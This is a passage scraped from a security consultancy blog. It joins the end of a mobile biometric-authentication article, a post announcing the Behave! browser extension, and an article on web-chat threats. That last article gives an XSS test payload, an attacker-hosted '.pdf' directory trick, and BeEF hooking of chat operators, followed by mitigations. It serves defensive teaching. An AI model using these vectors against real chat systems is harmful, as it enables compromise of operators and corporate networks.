<div><span id="docs-internal-guid-20c1b1af-7fff-3a21-b39a-a63740a8e677"><p dir="ltr" style="line-height: 1.38; margin-bottom: 12pt; margin-top: 12pt;"><span style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">When implementing biometric authentication on mobile application it is recommended to always use solutions that relies on cryptography and secure hardware such as the Keystore for Android and the Keychain for iOS.</span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 12pt; margin-top: 12pt;"><span style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Event-based authentication implementation should be considered insecure since they could be easily bypassed on rooted or jailbroken devices by using hooking techniques or tools such as Frida or Objection.</span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 12pt; margin-top: 12pt;"><span style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Highly sensitive applications such as banking apps or financial related applications should always rely on strong implementations when using biometric authentication and they should delete the sensitive data when the biometric set is changed or completely disabled.</span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 12pt; margin-top: 12pt;"><span style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Finally, for sensitive applications it is also suggested to implement frameworks in order to enhance their resiliency by detecting rooted/jailbroken device or attacks that make use of hooking techniques in order to reduce the risks of being exploited.</span></p><div><span style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div></span></div>
<h4 style="text-align: left;">References</h4>
<div><span id="docs-internal-guid-e8a76478-7fff-d901-9053-b6ac32d4e580"><p dir="ltr" style="line-height: 1.38; margin-bottom: 12pt; margin-top: 12pt;"><span style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">Android</span></p><ul style="margin-bottom: 0px; margin-top: 0px;"><li dir="ltr" style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: disc; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 12pt;"><a href="https://developer.android.com/training/sign-in/biometric-auth" style="text-decoration-line: none;"><span style="color: #1155cc; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space: pre-wrap;">https://developer.android.com/training/sign-in/biometric-auth</span></a></p></li><li dir="ltr" style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: disc; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><a href="https://github.com/OWASP/owasp-mstg/blob/master/Document/0x05f-Testing-Local-Authentication.md" style="text-decoration-line: none;"><span style="color: #1155cc; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space: pre-wrap;">https://github.com/OWASP/owasp-mstg/blob/master/Document/0x05f-Testing-Local-Authentication.md</span></a></p></li><li dir="ltr" style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: disc; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 12pt; margin-top: 0pt;"><a href="https://source.android.com/security/biometric" style="text-decoration-line: none;"><span style="color: #1155cc; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space: pre-wrap;">https://source.android.com/security/biometric</span></a></p></li></ul><br /><p dir="ltr" style="line-height: 1.38; margin-bottom: 12pt; margin-top: 12pt;"><span style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">iOS</span></p><ul style="margin-bottom: 0px; margin-top: 0px;"><li dir="ltr" style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: disc; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 12pt;"><a href="https://developer.apple.com/documentation/localauthentication/logging_a_user_into_your_app_with_face_id_or_touch_id" style="text-decoration-line: none;"><span style="color: #1155cc; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space: pre-wrap;">https://developer.apple.com/documentation/localauthentication/logging_a_user_into_your_app_with_face_id_or_touch_id</span></a></p></li><li dir="ltr" style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: disc; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 12pt; margin-top: 0pt;"><a href="https://github.com/OWASP/owasp-mstg/blob/master/Document/0x06f-Testing-Local-Authentication.md" style="text-decoration-line: none;"><span style="color: #1155cc; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space: pre-wrap;">https://github.com/OWASP/owasp-mstg/blob/master/Document/0x06f-Testing-Local-Authentication.md</span></a></p></li></ul><br /><p dir="ltr" style="line-height: 1.38; margin-bottom: 12pt; margin-top: 12pt;"><span style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">This article is the result of research through the official Android and iOS developer guides, the OWASP Mobile Security Testing Guide (https://owasp.org/www-project-mobile-security-testing-guide/) and the assessment activities on mobile applications performed by Minded Security’s consultants.</span></p><div><span style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div></span></div>
<div><br /></div>
<h4 style="text-align: left;">Authors</h4>
<div>
<ul style="text-align: left;">
<li>Michele Tumolo </li>
<li>Giuseppe Porcu</li>
</ul>
</div>
Michele Tumolohttp://www.blogger.com/profile/08083704549860162234noreply@blogger.com0tag:blogger.com,1999:blog-7122745763234660283.post-56588500601102691952020-06-30T08:52:00.001-07:002020-06-30T08:55:22.357-07:00Behave! A monitoring browser extension for pages acting as "bad boi".<h2>
<a href="https://user-images.githubusercontent.com/1196560/84408775-d7e64980-ac0c-11ea-87ed-38da5c38ffc6.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://user-images.githubusercontent.com/1196560/84408775-d7e64980-ac0c-11ea-87ed-38da5c38ffc6.png" /></a></h2>
<h3>
Browsing: What Could Go Wrong?</h3>
<div>
<div>
There's so much literature about client side attacks, but most of the focus is usually about classical malware attacks, exploiting software vulnerabilities.</div>
<div>
<br /></div>
<div>
Malicious scripts happen to be executed every day by thousands of people and most of the times Malware/Virus/Malvertising try to exploit vulnerabilities or to lure the user to install software on his own machine with the intent of staying undetected as much as possible in order to do its criminal business. </div>
<div>
That's what AntiMalware/Virus/[...] are for.</div>
<div>
<br /></div>
<div>
It's the principle of minimum energy: usual malware wants comfortable, smooth, local execution. </div>
</div>
<div>
<div>
<br /></div>
</div>
<div>
<div>
However, there's quite a number of alternative attacks on the client side, with minimal fingerprint that tend to drag less attention and that might go unnoticed on several environments.</div>
</div>
<div>
<br /></div>
<div>
<div>
Indeed there's a history of <a href="https://www.forcepoint.com/sites/default/files/resources/files/report-attacking-internal-network-en_0.pdf" target="_blank">such alternative attacks </a>as:</div>
<div>
<ul>
<li><b><a href="https://web.archive.org/web/20060821065413/http://www.spidynamics.com/assets/documents/JSportscan.pdf" target="_blank">Local</a> <a href="https://www.gnucitizen.org/blog/javascript-port-scanner/" target="_blank">Port</a> <a href="https://blog.jeremiahgrossman.com/2006/11/browser-port-scanning-without.html" target="_blank">Scan</a></b>: <i>Impact</i>: Information Gathering which could be used to perform further client side attacks (Malware) or to have a better unique user profile (Advertising/RiskAnalysis).</li>
<li><b><a href="https://www.nccgroup.com/us/our-research/cross-protocol-request-forgery/" target="_blank">Cross Protocol attacks</a></b>: <i>Impact</i>: according to the protocol there might be an abuse of specific features. Such as SMTP abuse etc.</li>
<li><b><a href="https://medium.com/@brannondorsey/attacking-private-networks-from-the-internet-with-dns-rebinding-ea7098a2d325" target="_blank">DNS</a> <a href="https://threatpost.com/unpatched-wi-fi-extender-remote-control/156990/" target="_blank">rebinding</a>: </b><i>Impact: SOP bypass resulting in reading sensitive information of internal network servers.</i></li>
</ul>
</div>
<div>
<br /></div>
<div>
which are not news at all. They are, indeed, quite old attacks that are still as reliable as difficult to completely "fix" by browser vendors because they abuse core features of the Web ecosystem.</div>
<div>
<br /></div>
</div>
<h3>
Behave! A Monitoring Extension for pages acting as "bad boi"</h3>
<div>
With those attacks in mind, we thought that, by taking advantage of the browser API at extension layer, a <a href="https://github.com/mindedsecurity/behave" target="_blank">browser extension</a> might help monitoring HTML pages behavior.</div>
<div>
That's <a href="https://github.com/mindedsecurity/behave" target="_blank">Behave!</a></div>
<div>
Available as an extension for:</div>
<div>
<br />
<ul>
<li>Firefox: <a href="https://addons.mozilla.org/en-US/firefox/addon/behave/">https://addons.mozilla.org/en-US/firefox/addon/behave/</a></li>
</ul>
<ul>
<li>Chrome: <a href="https://chrome.google.com/webstore/detail/mppjbkhgconmemoeagfbgilblohhcica/">https://chrome.google.com/webstore/detail/mppjbkhgconmemoeagfbgilblohhcica/</a></li>
</ul>
</div>
<br />
It monitors and warn if a web page performs any of following actions:<br />
<br />
<ul>
<li>Browser based Port Scan</li>
<li>Access to Private IPs</li>
<li>DNS Rebinding attacks to Private IPs</li>
</ul>
<div>
Here's Behave! pointing its finger to a malicious page hosted by <i><u>at.tack.er </u></i>host performing access to local IPs:</div>
<br />
<br />
<br />
<a href="https://user-images.githubusercontent.com/1196560/84412872-277a4480-ac10-11ea-8db2-0e8eec9adc21.png" rel="noopener noreferrer" style="box-sizing: border-box; color: #0366d6; font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Helvetica, Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji"; font-size: 16px; text-decoration-line: none;" target="_blank"><img alt="image" src="https://user-images.githubusercontent.com/1196560/84412872-277a4480-ac10-11ea-8db2-0e8eec9adc21.png" style="border-style: none; box-sizing: initial; max-width: 100%;" /></a><br />
<div>
<div style="background-color: white; box-sizing: border-box; color: #24292e; font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Helvetica, Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji"; font-size: 16px; margin-bottom: 16px;">
<br /></div>
<h3 style="background-color: white; box-sizing: border-box; color: #24292e; font-size: 16px; margin-bottom: 16px;">
<br /></h3>
<h3>
<span style="color: #24292e;">Behave! Future Plans </span></h3>
<div style="background-color: white; box-sizing: border-box; color: #24292e; font-family: , "blinkmacsystemfont" , "segoe ui" , "helvetica" , "arial" , sans-serif , "apple color emoji" , "segoe ui emoji"; font-size: 16px; margin-bottom: 16px;">
There's a quite a bunch of stealth&malicious client side techniques that could be abused at several levels of security that might be monitored by Behave! in the future.</div>
<div style="background-color: white; box-sizing: border-box; margin-bottom: 16px;">
<div style="color: #24292e; font-size: 16px;">
<a href="https://github.com/mindedsecurity/behave/issues" target="_blank">Any Idea is welcome as usual.</a></div>
<div style="color: #24292e; font-size: 16px;">
<br /></div>
<div style="color: #24292e; font-size: 16px;">
<br /></div>
<h3>
<br /></h3>
<div style="color: #24292e; font-size: 16px;">
<br /></div>
</div>
</div>
Stefano Di Paolahttp://www.blogger.com/profile/11966634329749157589noreply@blogger.com0tag:blogger.com,1999:blog-7122745763234660283.post-26722806089401157292020-05-18T02:59:00.000-07:002020-05-18T02:59:23.787-07:00Remote Working - Web Chats: Threats and countermeasures<h3 style="text-align: justify;">
Introduction</h3>
<div style="text-align: justify;">
<div style="text-align: justify;">
With recent worldwide events, a sharply increasing number of companies are offering remote services to their customers. Even traditional businesses are implementing new features or pushing the migration of existing features to new needs of dematerialization of human-to-human relationships. </div>
</div>
<div style="text-align: justify;">
<div style="text-align: justify;">
Web chats are an example of such trends.</div>
</div>
<div style="text-align: justify;">
<div style="text-align: justify;">
<br /></div>
</div>
<h3 style="text-align: justify;">
Web chats</h3>
<div style="text-align: justify;">
<div style="text-align: justify;">
Rich messages web chats are a common feature implemented by companies to overcome the need of social distancing, while maintaining a close relationship with customers.</div>
</div>
<div style="text-align: justify;">
<div style="text-align: justify;">
An example of rich messages web chat would be a graphical widget loaded by web site visitors to establish a chat session with a human operator, with the objective of sharing documents in a multimedia environment: users can share PDF files (e.g. personal documents, scans), video or audio files (e.g. vocal record of a formal declaration, acceptance of conditions and clauses for contracts, identity recognition) or even unpredicted formats, to deal with the abundance of multimedia files offered by end-user environments.</div>
</div>
<div style="text-align: justify;">
<div style="text-align: justify;">
To do so, preview feature has a crucial role.</div>
</div>
<h4 style="text-align: justify;">
Scenario</h4>
<div>
<div style="text-align: justify;">
As shown below, a typical scenario is a web server exposing chat capabilities, allowing human operators in a trusted network (e.g. a LAN) to interact with remote customers.</div>
<div style="text-align: justify;">
Usually, customers interact with the chat using a common browser over an untrusted network (the Internet, their own device); chat operators interact with customers using a browser or the backoffice component of the web chat, which commonly offers rich features, such as document viewing, session management, multiple channels interaction and capabilities to interact with customers in an "enhanced" manner.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
This article will describe several attack vectors from potentially malicious remote customers against targeted chat operators and the software they use to interact with customers: the objective of described workflows is attacking the trusted internal corporate network.</div>
<div style="text-align: justify;">
<br /></div>
</div>
<div>
<div style="text-align: justify;">
<br /></div>
</div>
<div class="separator" style="clear: both; text-align: justify;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj3cXr-4yFOoNKG7uDkzur7Xvx1cjBqRznirKuNRssKVdF9ELVB8Vbm6kxhAmJSTfZy6r1Y1jaWvU6XpNwOgDDPsdt-2559ly-3XgSqcpDGjpNqQjZ7fTIc6P-qG5KTIC7GoHVfKm4BOWs2/s1600/Diagram1.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="423" data-original-width="902" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj3cXr-4yFOoNKG7uDkzur7Xvx1cjBqRznirKuNRssKVdF9ELVB8Vbm6kxhAmJSTfZy6r1Y1jaWvU6XpNwOgDDPsdt-2559ly-3XgSqcpDGjpNqQjZ7fTIc6P-qG5KTIC7GoHVfKm4BOWs2/s1600/Diagram1.png" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div>
<div style="text-align: justify;">
<br /></div>
</div>
<h4 style="text-align: justify;">
Rich data exchange interaction</h4>
<div style="text-align: justify;">
<div style="text-align: justify;">
Backoffice chat components trie to recognize messages, files and URLs submitted by chat users with the aim of previewing them or offering operators with advanced tools to manipulate data.</div>
<div style="text-align: justify;">
Different recognition approaches are usually in place: parse file extensions, MIME type of uploaded files, and actually reading the real content of the file prior to supplying it to the operator.</div>
<div style="text-align: justify;">
If the recognition procedure does not thoroughly include a secure implementation of all the mentioned approaches, chat operators and internal resources may be prone to security threats.</div>
<div style="text-align: justify;">
<br /></div>
<h3 style="text-align: justify;">
Threats</h3>
</div>
<div style="text-align: justify;">
Web chats can accept several formats for files, sent by users (e.g. with drag & drop) or submitting URLs.</div>
<div style="text-align: justify;">
<br /></div>
<h4 style="text-align: justify;">
HTML payloads</h4>
<div style="text-align: justify;">
The simplest and most known attack vector is abusing the HTML parser of web chats:</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Customer enters <span style="font-family: "courier new" , "courier" , monospace;"><b>ciao!</b></span></div>
<div style="text-align: justify;">
<span style="font-family: inherit;">Operator sees <b>ciao!</b></span></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Customer enters <span style="font-family: "courier new" , "courier" , monospace;"><script>alert("XSS!")</script></span></div>
<div style="text-align: justify;">
Operator sees:</div>
<div class="separator" style="clear: both; text-align: justify;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7mPA450e6Ih0VbpFF-3yBQPawR8MSIP2oxWXSEDcXH9BV_DV4MfWcN1vYdGMgABlK0hYsLGtDJheoBbsng-G4EHOZzW4hlvzNDLrBisykXxlEcNJolH6QaUYygFPVoRsdUF1ol5VNrfKr/s1600/xss.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="894" data-original-width="426" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7mPA450e6Ih0VbpFF-3yBQPawR8MSIP2oxWXSEDcXH9BV_DV4MfWcN1vYdGMgABlK0hYsLGtDJheoBbsng-G4EHOZzW4hlvzNDLrBisykXxlEcNJolH6QaUYygFPVoRsdUF1ol5VNrfKr/s640/xss.png" width="304" /></a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<br /></div>
<h4 style="text-align: justify;">
Malformed PDF file upload</h4>
<div style="text-align: justify;">
User supplied PDF files can be opened by chat operators in embedded viewers in the backoffice component of the web chat or downloaded on their workstation, within the trusted corporate network.</div>
<div style="text-align: justify;">
Such files can be vehicle of arbitrary code (e.g. JavaScript or other active code), which can therefore be executed on the endpoint of chat operators, exploiting known vulnerabilities in the browser or in any other software used by operators to view the file.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
As an example, PDF files can contain dynamic JavaScript code, very similar to how XSS attacks work:</div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: justify;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjgmtuZVLfA14OSmh2BqrPfOjtG8JpCZCPdSrGJK6fZQOBvY1pNzABQUPVJjPOsfjvqS0fI8VmmjaCZOSlFdPSQZotzR2W80wWoQJyK6w3vQlv_mh4KSfc3dld5MOrYuVHhwZ0ysxr_ynEF/s1600/pdf_dynamic.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="601" data-original-width="1115" height="344" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjgmtuZVLfA14OSmh2BqrPfOjtG8JpCZCPdSrGJK6fZQOBvY1pNzABQUPVJjPOsfjvqS0fI8VmmjaCZOSlFdPSQZotzR2W80wWoQJyK6w3vQlv_mh4KSfc3dld5MOrYuVHhwZ0ysxr_ynEF/s640/pdf_dynamic.png" width="640" /></a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Thus, malformed PDFs, especially if loaded with an outdated Adobe Acrobat version, can be an attack vector for further exploits (e.g. meterpreter payloads, malwares, droppers..) against the internal network, the browser, the operating system or other components in the trusted backoffice environment.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<u>Note</u>: any security concern for PDF files should be extended to Office documents (Word, Excel, Powerpoint), especially if older and/or not hardened versions of Microsoft Office are in use.</div>
<div style="text-align: justify;">
For example threats may include malwares embedded in Office documents or CSV Formula Injection attacks.</div>
<div style="text-align: justify;">
<br /></div>
<h4 style="text-align: justify;">
Malicious URLs (Abusing preview feature)</h4>
<div style="text-align: justify;">
Web chats tries to parse URLs pasted by users' messages, with the aim of previewing their content.</div>
<div style="text-align: justify;">
If the parsing procedure is executed correctly, the PDF is previewed by an embedded viewer, and it can therefore lead to scenarios described above.</div>
<div style="text-align: justify;">
On the contrary, if the parsing procedure is not correctly executed, the preview mechanism (triggered by the presence of ".PDF" string in the URL) can lead to unexpected events.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
For example, if the URL ends with ".pdf" string, the web chat may attempt to dynamically load <i>any</i> preview module. As shown below, ".pdf" in the URL does not indicate a real PDF file, but a folder named ".pdf" on an arbitrary web server.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Content of the attacker's web site:</div>
<div style="text-align: justify;">
<br /></div>
<br />
<div style="text-align: justify;">
<span style="font-family: "courier new" , "courier" , monospace;">$ ls ./.pdf -1</span></div>
<div style="text-align: justify;">
<div style="text-align: justify;">
<span style="font-family: "courier new" , "courier" , monospace;">minded</span><span style="font-family: inherit;"> (executable file)</span></div>
<div style="text-align: justify;">
<span style="font-family: "courier new" , "courier" , monospace;">minded.html</span> (malicious HTML file)</div>
<div style="text-align: justify;">
<span style="font-family: "courier new" , "courier" , monospace;">minded.pdf</span> (malicious PDF file)</div>
<div style="text-align: justify;">
<span style="font-family: "courier new" , "courier" , monospace;">$ </span></div>
<div style="text-align: justify;">
<br /></div>
</div>
<br />
<div style="text-align: justify;">
Behaviour of the preview on chat operator's software:</div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: justify;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiOY1JdERJoEVExDtiaQAYbthq2M8Kvm16HBMhdqQdXSybzmBZ1v02pwD1H7Rygv0-L85K8XJnwmQzY3h-j8ICeDAtOVVudgYIzeg6RMlL0jmzwycKO0NrGwVUZqRryJr56rQej_CM4_zGi/s1600/directory_listing1.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="772" data-original-width="732" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiOY1JdERJoEVExDtiaQAYbthq2M8Kvm16HBMhdqQdXSybzmBZ1v02pwD1H7Rygv0-L85K8XJnwmQzY3h-j8ICeDAtOVVudgYIzeg6RMlL0jmzwycKO0NrGwVUZqRryJr56rQej_CM4_zGi/s640/directory_listing1.png" width="604" /></a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Several social engineering scenarios can be constructed over this behaviour, for example convincing the chat operator (whose job is trying to efficently interact with a customer) to download other files.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Semi-automatic scenarios, on the other hand, can include the execution of arbitrary code in HTML files, abusing the preview feature. For example, it would be possible to spawn a BeEF HTML hook against the browser in use by the chat operator:</div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: justify;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhp8VDVtUw_BVcqfwqqU038-gSrubBe9tTIzu40oh7ZX3BBsDI0dtV9-nTEe_qoUZhRUFv12CxSYtNszEIVXfqL08OeXoCGU5P2phjpHAQC49NZMLAX5AEgesnEl3WIo5k9vWeL-bZowhou/s1600/pdf_active_BEEF1.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="742" data-original-width="718" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhp8VDVtUw_BVcqfwqqU038-gSrubBe9tTIzu40oh7ZX3BBsDI0dtV9-nTEe_qoUZhRUFv12CxSYtNszEIVXfqL08OeXoCGU5P2phjpHAQC49NZMLAX5AEgesnEl3WIo5k9vWeL-bZowhou/s640/pdf_active_BEEF1.png" width="618" /></a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
The command & control server (used by the attacker / evil customer) would look similar to the following:</div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: justify;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiRrxn9se6Ph9khh_JOiXg0tzUpMNglTZ0QoZgpM10kZGvvJLn-0rgOEXc6HHVLTUJO7OjaoHOGlJHEz5HoJgImiu7UHdw8VOGe_IkZhsv8mCeN96bjn9Swgx6eiyTq7TSddACXPZ_i0jOS/s1600/pdf_active_beef2.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="374" data-original-width="941" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiRrxn9se6Ph9khh_JOiXg0tzUpMNglTZ0QoZgpM10kZGvvJLn-0rgOEXc6HHVLTUJO7OjaoHOGlJHEz5HoJgImiu7UHdw8VOGe_IkZhsv8mCeN96bjn9Swgx6eiyTq7TSddACXPZ_i0jOS/s1600/pdf_active_beef2.png" /></a></div>
<div style="text-align: justify;">
<br /></div>
<br />
<div style="text-align: justify;">
<span style="font-weight: normal;">Consequently, the attacker can use a large plethora of social engineering / hijacking techniques.</span></div>
<div style="text-align: justify;">
<span style="font-weight: normal;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-weight: normal;">For example, spawning fake system messages / Java Applet load requests:</span></div>
<div style="text-align: justify;">
<span style="font-weight: normal;"><br /></span></div>
<div class="separator" style="clear: both; text-align: justify;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEid4D5AH6Udstu2qbmorw3WyRNOyMZmxuWAbXNY5XCQQzB03Qzs2obt0P6jxxhog2zrmL5sXpbiPHKSEnbaL9TQr3Omj2V1xMqLN3_HZ4Q7pk7FqgglZ-3j8Ilfm1fQ_6xJHBZfh7u_R1Qm/s1600/arbitrary_content3.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="773" data-original-width="740" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEid4D5AH6Udstu2qbmorw3WyRNOyMZmxuWAbXNY5XCQQzB03Qzs2obt0P6jxxhog2zrmL5sXpbiPHKSEnbaL9TQr3Omj2V1xMqLN3_HZ4Q7pk7FqgglZ-3j8Ilfm1fQ_6xJHBZfh7u_R1Qm/s640/arbitrary_content3.png" width="612" /></a></div>
<div style="text-align: justify;">
<span style="font-weight: normal;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-weight: normal;"><br /></span></div>
<div>
<div style="text-align: justify;">
Or even spawning fake Clippy Office Assistants:</div>
</div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: justify;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjwg8qOW3FSeGV-Eno-9QQJVkFGukQnspZTYROC7l6h8aJqbUVOQ3l1pqaRlIe3kz89qrJwEwLuQA_px3OLqOgMBCDdQITjGtLesNigkldRl_HQQDCrHRH-LJrxBqO3Ldi-k8xLHeMS3PuD/s1600/arbitrary_content.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="772" data-original-width="718" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjwg8qOW3FSeGV-Eno-9QQJVkFGukQnspZTYROC7l6h8aJqbUVOQ3l1pqaRlIe3kz89qrJwEwLuQA_px3OLqOgMBCDdQITjGtLesNigkldRl_HQQDCrHRH-LJrxBqO3Ldi-k8xLHeMS3PuD/s640/arbitrary_content.png" width="594" /></a></div>
<div style="text-align: justify;">
<span style="font-weight: normal;"><br /></span></div>
<div style="text-align: justify;">
<br /></div>
<div>
<h4 style="text-align: justify;">
Embedded players</h4>
<div style="text-align: justify;">
Web chats may also include MP3 players, which, depending on the library in use by the chat software, may be prone to vulnerabilities related to outdated software modules.</div>
<div style="text-align: justify;">
<br /></div>
</div>
<div class="separator" style="clear: both; text-align: justify;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiuRymM6eJk66tic92-NT9XtuNa2CW49-HgRRWMlJwMosVE2x1B8NrlCIy0DmNgWJN6HlbJvZE7_KTJR0okrSDLLlrezKPnr-rUhkxDEWXZCqvGOGnSL4tF8MmgP3vxqgV-TO8C1SUu63Yb/s1600/mp3.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="132" data-original-width="463" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiuRymM6eJk66tic92-NT9XtuNa2CW49-HgRRWMlJwMosVE2x1B8NrlCIy0DmNgWJN6HlbJvZE7_KTJR0okrSDLLlrezKPnr-rUhkxDEWXZCqvGOGnSL4tF8MmgP3vxqgV-TO8C1SUu63Yb/s1600/mp3.png" /></a></div>
<div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<br /></div>
</div>
<h3 style="text-align: justify;">
Mitigations</h3>
<div style="text-align: justify;">
<ul>
<li style="text-align: justify;">Validate any uploaded file according to a predefined list of expected file types:</li>
</ul>
<blockquote class="tr_bq" style="text-align: justify;">
<div style="text-align: justify;">
- Extension</div>
<div style="text-align: justify;">
- Content Type</div>
<div style="text-align: justify;">
- Actual content of the file</div>
</blockquote>
</div>
<div style="text-align: justify;">
<ul>
<li style="text-align: justify;">Rescale / Resize with a 1:1 ratio any multimedia file, before allowing chat operators to open the file, in the attempt of removing any metadata</li>
<li style="text-align: justify;">Properly hardening procedures should be applied to any software in use by chat operators:</li>
</ul>
<blockquote class="tr_bq" style="text-align: justify;">
<div style="text-align: justify;">
- Update PDF viewer software to the latest available version</div>
<div style="text-align: justify;">
- Apply proper security options (e.g. Enhanced security and protected mode in Adobe Acrobat) to harden PDF viewer software</div>
</blockquote>
</div>
<div style="text-align: justify;">
<ul>
<li style="text-align: justify;">Define a list of allowed file types for the preview feature, avoiding any other format: if chat operators are expected to receive only URLs, documents and images, define a list where only PDFs and JPGs/PNGs are allowed, while any other extension is <i>excluded</i> from previewing components.</li>
</ul>
<div style="text-align: justify;">
<br /></div>
</div>
<div style="text-align: justify;">
<h3 style="text-align: justify;">
References</h3>
<div>
<div style="text-align: justify;">
https://acrobatusers.com/assets/collections/tutorials/legacy/tech_corners/javascript_corner/tips/2006/popup_windows_part2/AlertBoxExamples.pdf</div>
<div style="text-align: justify;">
